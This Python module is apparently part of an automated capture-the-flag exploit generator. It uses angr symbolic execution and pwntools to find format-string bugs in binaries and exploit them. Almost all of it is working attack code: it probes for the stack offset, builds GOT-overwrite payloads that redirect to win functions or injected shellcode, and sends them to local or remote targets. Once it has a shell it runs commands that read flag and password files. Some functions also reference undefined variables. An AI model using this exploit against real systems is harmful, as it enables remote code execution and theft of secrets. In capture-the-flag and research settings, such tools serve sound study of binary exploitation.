import angr
from angr import sim_options as so
import claripy
from pwn import *
from zeratool import printf_model
from .overflowExploiter import getRegValues, findShellcode
from .simgr_helper import getShellcode
import timeout_decorator
import time
import string
import logging

log = logging.getLogger(__name__)


def exploitFormat(binary_name, properties):

    exploit_results = {}
    exploit_results["flag_found"] = False

    input_pos = properties["pwn_type"]["position"]
    input_len = properties["pwn_type"]["length"]
    input_string = properties["pwn_type"]["input"]

    if "64" in properties["protections"]["arch"]:
        context.arch = "amd64"

    # Slice constrolled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    format_specifier = b"lx"
    format_prefix = b"aaaa_%"
    if "amd64" in properties["protections"]["arch"]:
        format_specifier = b"llx"
        format_prefix = b"aaaaaaaa_%"

    stack_position = -1
    log.info("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_byte = str(i).encode()
        iter_string = format_prefix + iter_byte + b"$" + format_specifier + b"_"
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)
        log.info(iter_string)
        results = runIteration(
            binary_name, iter_string, input_type=properties["input_type"]
        )
        if b"61616161" in results:  # 0x41414141 == "AAAA"
            stack_position = i
            log.info("[+] Found stack location at {}".format(stack_position))
            break

    if stack_position == -1:
        log.info("Could not find stack position")
        return None

    if len(properties["win_functions"]) > 0:
        for func in properties["win_functions"]:
            address = properties["win_functions"][func]["fcn_addr"]
            for got_name, got_addr in list(properties["protections"]["got"].items()):
                log.info("[~] Overwritting {} -> {}".format(got_name, hex(address)))
                writes = {got_addr: address}
                format_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                if len(format_payload) > input_len or True:
                    log.info("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(
                        stack_position,
                        writes,
                        numbwritten=input_pos,
                        write_size="short",
                    )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                log.info(repr(format_input))
                results = sendExploit(binary_name, properties, format_input)
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
        return exploit_results
    elif not properties["protections"]["nx"]:
        log.info("[+] Binary does not have NX")
        log.info("[+] Overwriting GOT entry to point to shellcode")
        rediscoverAndExploit(binary_name, properties, stack_position)
    else:
        log.info("[+] Overwriting GOT entry to point to one gadget RCE")


"""
Run until we hit our hooked printf.
Constrain input to crafted string:
    String = (Format GOT Write) + (Shellcode)
"""


def rediscoverAndExploit(binary_name, properties, stack_position):

    properties["shellcode"] = getShellcode(properties)
    properties["stack_position"] = stack_position
    inputType = properties["input_type"]

    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY, so.TRACK_CONSTRAINTS}

    # p = angr.Project(binary_name,load_options={"auto_load_libs": False})
    p = angr.Project(binary_name, load_options={"auto_load_libs": False})

    p.hook_symbol("printf", printFormatSploit())

    # Setup state based on input type
    argv = [binary_name]
    input_arg = claripy.BVS("input", 400 * 8)
    if inputType == "STDIN":
        """
        angr doesn't use the right base and stack pointers
        when loading the binary, so our addresses are all wrong.
        So we need to grab them manually
        """
        entryAddr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name, entryAddr)
        state = p.factory.full_init_state(
            args=argv,
            add_options=extras,
            stdin=input_arg,
            env=os.environ,
        )

        register_names = list(state.arch.register_names.values())
        for register in register_names:
            if register in reg_values:  # Didn't use the register
                state.registers.store(register, reg_values[register])

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        start_addr = handle_connection.rebased_addr

        reg_values = getRegValues(binary_name, start_addr)

        state = p.factory.entry_state(
            args=argv,
            env=os.environ,
            addr=start_addr,
            add_options=extras,
            stdin=input_arg,
        )

        register_names = list(state.arch.register_names.values())
        for register in register_names:
            if register in reg_values:  # Didn't use the register
                state.registers.store(register, reg_values[register])

    else:
        arg = claripy.BVS("arg1", 300 * 8)
        argv.append(arg)
        state = p.factory.full_init_state(args=argv)
        state.globals["arg"] = arg

    state.libc.buf_symbolic_bytes = 0x100
    state.globals["user_input"] = input_arg
    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state)

    run_environ = {}
    run_environ["type"] = None
    end_state = None
    # Lame way to do a timeout
    try:

        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            simgr.explore(find=lambda s: "type" in s.globals)

        exploreBinary(simgr)
        if "found" in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ["type"] = end_state.globals["type"]
            run_environ["position"] = end_state.globals["position"]
            run_environ["length"] = end_state.globals["length"]

    except (KeyboardInterrupt, timeout_decorator.TimeoutError) as e:
        log.info("[~] Format check timed out")
    if (inputType == "STDIN" or inputType == "LIBPWNABLE") and end_state is not None:
        stdin_str = str(end_state.posix.dumps(0))
        log.info("[+] Triggerable with STDIN : {}".format(stdin_str))
        run_environ["input"] = stdin_str
    elif inputType == "ARG" and end_state is not None:
        arg_str = str(end_state.solver.eval(arg, cast_to=str))
        run_environ["input"] = arg_str
        log.info("[+] Triggerable with arg : {}".format(arg_str))

    return run_environ

    pass


def get_num_constraints(chop_byte, state):
    constraints = state.solver.constraints
    i = 0
    # Do any constraints mention this BV?
    for constraint in constraints:
        if any(
            chop_byte.structurally_match(x) for x in constraint.recursive_children_asts
        ):
            i += 1
    # log.info("{} : {} : {}".format(chop_byte,i,state.solver.eval(chop_byte,cast_to=bytes)))
    return i


# Better symbolic strlen
def get_max_strlen(state, value):
    i = 0
    for c in value.chop(8):  # Chop by byte
        i += 1
        if not state.solver.satisfiable([c != 0x00]):
            log.debug("Found the null at offset : {}".format(i))
            return i - 1
    return i


def get_trimmed_input(user_input, state):
    trim_index = -1
    index = 0
    for c in user_input.chop(8):
        num_constraints = get_num_constraints(c, state)
        if num_constraints == 0 and trim_index == -1:
            trim_index = index
        else:
            trim_index == -1
        index += 1

    input_bytes = state.solver.eval(user_input, cast_to=bytes)

    if trim_index > 0:
        log.debug("Found input without constraints starting at {}".format(trim_index))
        return input_bytes[:trim_index]

    return input_bytes


class printFormatSploit(angr.procedures.libc.printf.printf):
    IS_FUNCTION = True

    def checkExploitable(self, fmt):
        """
        For each value passed to printf
        Check to see if there are any symbolic bytes
        Passed in that we control
        """
        bits = self.state.arch.bits
        load_len = int(bits / 8)
        max_read_len = 1024
        """
        For each value passed to printf
        Check to see if there are any symbolic bytes
        Passed in that we control
        """
        i = 0
        state = self.state
        solv = state.solver.eval
        properties = self.state.globals["properties"]

        # fmt_len = self._sim_strlen(fmt)
        # # We control format specifier and strlen isn't going to be helpful,
        # # just set it ourselves
        # if len(state.solver.eval_upto(fmt_len,2)) > 1:
        #     while not state.satisfiable(extra_constraints=[fmt_len == max_read_len]):
        #         max_read_len -=1
        #         if max_read_len < 0:
        #             raise Exception("fmt string with no length!")
        #     state.add_constraints(fmt_len == max_read_len)

        printf_arg = self.arguments[i]

        var_loc = solv(printf_arg)

        # Parts of this argument could be symbolic, so we need
        # to check every byte
        var_data = state.memory.load(var_loc, max_read_len)
        var_len = get_max_strlen(state, var_data)

        fmt_len = self._sim_strlen(fmt)
        # if len(state.solver.eval_upto(fmt_len,2)) > 1:
        #     state.add_constraints(fmt_len == var_len)

        # Reload with just our max len
        var_data = state.memory.load(var_loc, var_len)

        log.info("Building list of symbolic bytes")
        symbolic_list = [
            state.memory.load(var_loc + x, 1).symbolic for x in range(var_len)
        ]
        log.info("Done Building list of symbolic bytes")

        """
        Iterate over the characters in the string
        Checking for where our symbolic values are
        This helps in weird cases like:

        char myVal[100] = "I\'m cool ";
        strcat(myVal,STDIN);
        printf("My super cool string is %s",myVal);                                                                                   """
        position = 0
        count = 0
        greatest_count = 0
        prev_item = symbolic_list[0]
        for sym_i in range(1, len(symbolic_list)):
            if (
                symbolic_list[sym_i]
                and symbolic_list[sym_i] == symbolic_list[sym_i - 1]
            ):
                count = count + 1
                if count > greatest_count:
                    greatest_count = count
                    position = sym_i - count
            else:
                if count > greatest_count:
                    greatest_count = count
                    position = sym_i - 1 - count
                    # previous position minus greatest count
                count = 0
        log.info(
            "[+] Found symbolic buffer at position {} of length {}".format(
                position, greatest_count
            )
        )

        if greatest_count > 0:
            shellcode = properties["shellcode"]
            stack_pos = properties["stack_position"]

            for got_name, got_addr in list(properties["protections"]["got"].items()):
                #                for got_name,got_addr in [(x,y) for (x,y) in properties['protections']['got'].items() if x in " exit"]: #debug for hard_format
                backup_state = state.copy()
                log.info("[+] Overwiting {} at {}".format(got_name, hex(got_addr)))

                solv = state.solver.eval

                # Mock write to get approx length
                buffer_address = var_loc + position
                writes = {got_addr: buffer_address}  # Begining of buffer
                format_write = fmtstr_payload(
                    stack_pos, writes, numbwritten=position, write_size="short"
                )
                write_len = len(format_write)

                # Real write
                buffer_address = var_loc + position + write_len
                writes = {got_addr: buffer_address}
                format_write = fmtstr_payload(
                    stack_pos, writes, numbwritten=position, write_size="short"
                )

                # Final payload
                if isinstance(shellcode, str):
                    shellcode = shellcode.encode()
                format_payload = format_write + shellcode

                var_value_length = len(format_payload)
                self.constrainBytes(
                    state,
                    var_data,
                    var_loc,
                    position,
                    var_value_length,
                    strVal=format_payload,
                )

                user_input = state.globals["user_input"]
                user_input = get_trimmed_input(user_input, state)

                log.info("[+] Format buffer at {}".format(hex(var_loc)))
                log.info("[+] Shellcode located at {}".format(hex(buffer_address)))
                log.info("[+] Format write:\n{}".format(repr(format_write)))
                log.info("[+] Constructed payload:\n{}".format(repr(format_payload)))
                log.info("[+] Constructed stdout:\n{}".format(repr(user_input)))

                vuln_string = solv(var_data, cast_to=bytes)

                binary_name = state.project.filename
                results = {}
                results["flag_found"] = False
                log.info("[~] Testing payload")

                results = sendExploit(binary_name, properties, user_input)
                if results["flag_found"] == True:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                else:  # Maybe angr still messed up the pointer
                    log.info("[-] Payload launch failed. Fixing angr stack pointer")

                    # Find the last basic block executed

                    first_input = state.posix.dumps(0)

                    end_eip = state.se.eval(state.regs.pc)

                    last_bb = [
                        x
                        for x in state.history.bbl_addrs
                        if state.project.loader.main_object.contains_addr(x)
                    ][-1]
                    last_bb_addr = last_bb  # int(last_bb.split(' ')[2].rstrip(':'),16) #I'm sorry I'm parsing like this

                    if isinstance(shellcode, str):
                        shellcode = shellcode.encode()

                    ret_location = findShellcode(
                        binary_name, last_bb_addr, shellcode, first_input
                    )

                    if len(ret_location) == 0:
                        log.info(
                            "[-] Unable to find shellcode location for corrected stack"
                        )
                        finish_pointer = False
                    else:
                        real_location = ret_location["offset"]
                        finish_pointer = True

                    if finish_pointer:

                        state_copy = backup_state.copy()

                        solv = state_copy.solver.eval

                        printf_arg = self.arguments[i]

                        var_loc = solv(printf_arg)  # Assume it's a pointer

                        if var_loc == 0:
                            log.info(
                                "[-] Value at stack offset {} not a pointer".format(i)
                            )
                            continue

                        var_value = state_copy.memory.load(var_loc, var_len)

                        var_value_length = int("0x" + str(var_value.length), 16)

                        writes = {got_addr: real_location}
                        format_write = fmtstr_payload(
                            stack_pos,
                            writes,
                            numbwritten=position,
                            write_size="short",
                        )
                        format_payload = format_write + properties["shellcode"]
                        var_value_length = len(format_payload)
                        self.constrainBytes(
                            state_copy,
                            var_value,
                            var_loc,
                            position,
                            var_value_length,
                            strVal=format_payload,
                        )

                        user_input = state_copy.globals["user_input"]
                        user_input = get_trimmed_input(user_input, state_copy)

                        log.info(
                            "[+] Shellcode located at {}".format(hex(real_location))
                        )
                        log.info(
                            "[+] Adjusted payload:\n{}".format(repr(format_payload))
                        )
                        log.info("[+] Constructed stdout:\n{}".format(repr(user_input)))

                        with open("command.input", "wb") as f:
                            f.write(user_input)

                        results_n = sendExploit(
                            binary_name,
                            properties,
                            user_input,
                        )
                        if results_n["flag_found"]:
                            log.info(
                                "[+] Vulnerable path found {}".format(repr(user_input))
                            )
                            self.state.globals["type"] = "Format"
                            self.state.globals["position"] = position
                            self.state.globals["length"] = greatest_count
                            return True

                            # exploit_results['flag_found'] = results_n['flag_found']
                            # exploit_results['input'] = format_input

                # Verify solution
                if (
                    state_copy.globals["inputType"] == "STDIN"
                    or state_copy.globals["inputType"] == "LIBPWNABLE"
                ) and results_n["flag_found"]:
                    stdin_str = str(state_copy.posix.dumps(0))
                    if format_payload in stdin_str or results["flag_found"]:
                        var_value = self.state.memory.load(var_loc, var_len)
                        self.constrainBytes(
                            self.state,
                            var_value,
                            var_loc,
                            position,
                            var_value_length,
                            strVal=format_payload,
                        )
                        log.info("[+] Vulnerable path found {}".format(vuln_string))
                        self.state.globals["type"] = "Format"
                        self.state.globals["position"] = position
                        self.state.globals["length"] = greatest_count

                        return True
                if state_copy.globals["inputType"] == "ARG":
                    arg = state.globals["arg"]
                    arg_str = str(state_copy.solver.eval(arg, cast_to=str))
                    if format_payload in arg_str:
                        var_value = self.state.memory.load(var_loc)
                        self.constrainBytes(
                            self.state,
                            var_value,
                            var_loc,
                            position,
                            var_value_length,
                            strVal=format_payload,
                        )
                        log.info("[+] Vulnerable path found {}".format(vuln_string))
                        self.state.globals["type"] = "Format"
                        self.state.globals["position"] = position
                        self.state.globals["length"] = greatest_count
                        return True
                state_copy = backup_state.copy()

        return False

    def constrainBytes(self, state, symVar, loc, position, length, strVal="%x_"):
        total_region = self.state.memory.load(loc, length)
        total_format = strVal * length
        # If we can constrain it all in one go, then let's do it!
        if state.solver.satisfiable(
            extra_constraints=[total_region == total_format[:length]]
        ):
            log.info("Can constrain it all, let's go!")
            state.add_constraints(total_region == total_format[:length])
            return

        for i in range(length):
            strValIndex = i % len(strVal)
            curr_byte = self.state.memory.load(loc + i, 1).get_byte(0)
            constraint = state.se.And(strVal[strValIndex] == curr_byte)
            if state.se.satisfiable(extra_constraints=[constraint]):
                state.add_constraints(constraint)
            else:
                log.info(
                    "[~] Byte {} not constrained to {}".format(
                        i, repr(strVal[strValIndex])
                    )
                )

    def run(self, _, fmt):
        if not self.checkExploitable(fmt):
            return super(type(self), self).run(fmt)


def getRemoteFormat(properties, remote_url, remote_port):
    exploit_results = {}

    input_pos = properties["pwn_type"]["position"]
    input_len = properties["pwn_type"]["length"]
    input_string = properties["pwn_type"]["input"]

    if "64" in properties["protections"]["arch"]:
        context.arch = "amd64"

    # Slice constrolled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    stack_position = -1
    log.info("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_string = "AAAA_%{}$08x_".format(i)
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)

        results = runIteration(
            None,
            iter_string,
            remote_server=True,
            remote_url=remote_url,
            remote_port=remote_port,
        )
        if "41414141" in results:  # 0x41414141 == "AAAA"
            stack_position = i
            log.info("[+] Found stack location at {}".format(stack_position))
            break

    if properties["win_functions"] is not None:
        for func in properties["win_functions"]:
            address = properties["win_functions"][func]["fcn_addr"]
            for got_name, got_addr in list(properties["protections"]["got"].items()):
                log.info("[~] Overwritting {}".format(got_name))
                writes = {got_addr: address}
                format_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                if len(format_payload) > input_len:
                    log.info("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(
                        stack_position,
                        writes,
                        numbwritten=input_pos,
                        write_size="short",
                    )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                log.info(repr(format_input))
                results = sendExploit(
                    None,
                    properties,
                    format_input,
                    remote_server=True,
                    remote_url=remote_url,
                    port_num=remote_port,
                )
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
        return exploit_results


"""
Maintain original input size
Change this later to use angr
And add these as constraints off a path
"""


def assembleInput(str_input, start_slice, end_slice, input_len):
    input_len
    str_len = len(str_input)
    for i in range(input_len - str_len):
        str_input += b"A"
    return start_slice + str_input + end_slice


def runIteration(
    binary_name,
    str_input,
    remote_server=False,
    remote_url="",
    remote_port=0,
    input_type="STDIN",
):

    if input_type == "STDIN" or input_type == "LIBPWNABLE":
        if remote_server:
            proc = remote(remote_url, remote_port)
        else:
            proc = process(binary_name)
        proc.sendline(str_input)

        results = proc.recvall(timeout=5)
        log.info(results)
        results_split = results.split(b"_")

        # Get only hex strings of 8 characters or fewer
        position_leak = [
            x for x in results_split if all([y in string.hexdigits.encode() for y in x])
        ]

        leak = list(filter(lambda x: (b"61616161" in x), position_leak))
        log.info(position_leak)
        if len(leak):
            return leak[0]
        return b""
        # There should only be one
        # leak = [position_leak][0]
    else:
        proc = process([binary_name, str_input.rstrip(b"\x00")])

        results = proc.recvall(timeout=5)
        log.info(results)
        results_split = results.split(b"_")

        # Get only hex strings of 8 characters or fewer
        position_leak = [
            x for x in results_split if all([y in string.hexdigits for y in x])
        ]

        # There should only be one
        leak = [position_leak][0]

    return leak


def sendExploit(
    binary_name,
    properties,
    input_string,
    remote_server=False,
    remote_url="",
    port_num=0,
):

    send_results = {}
    hadIssue = False

    if properties["input_type"] == "STDIN" or properties["input_type"] == "LIBPWNABLE":
        # Create local or remote process
        if remote_server:
            proc = remote(remote_url, port_num)
        else:
            proc = process(binary_name)

        proc.sendline(input_string)
        # log.info(repr(input_string))

        # Sometimes the flag is just printed
        results = proc.recvall(timeout=15)
    else:
        try:
            proc = process([binary_name, input_string])
        except:
            log.info("[-] Issue with nulls in arg")
            hadIssue = True

        # log.info(repr(input_string))

        # Sometimes the flag is just printed
    if not hadIssue:
        results = proc.recvall(timeout=15)

    log.info(results)
    send_results["flag_found"] = False
    if not hadIssue and b"{" in results and b"}" in results:
        send_results["flag_found"] = True
        log.info("[+] Flag found:")
        log.info(results.replace(b"\x20", b""))
    # Flag not in stdout, we have a shell
    else:

        if (
            properties["input_type"] == "STDIN"
            or properties["input_type"] == "LIBPWNABLE"
        ):
            if remote_server:
                proc = remote(remote_url, port_num)
            else:
                proc = process(binary_name)
            proc.sendline(input_string)
        else:
            try:
                proc = process([binary_name, input_string])
            except:
                log.info("[-] Issue with nulls in arg")

        try:
            proc.sendline()
            proc.sendline(b"ls;\n")
            proc.sendline(b"cat *flag*;\n")
            proc.sendline(b"cat *pass*;\n")
            command_results = proc.recvall(
                timeout=30
            )  # Need a better way to "time out"
            # log.info(command_results)
            if b"{" in command_results and b"}" in command_results:
                send_results["flag_found"] = True
                log.info("[+] Flag found:")
                log.info(command_results.replace(b"\x20", b""))
        except:
            pass

    return send_results
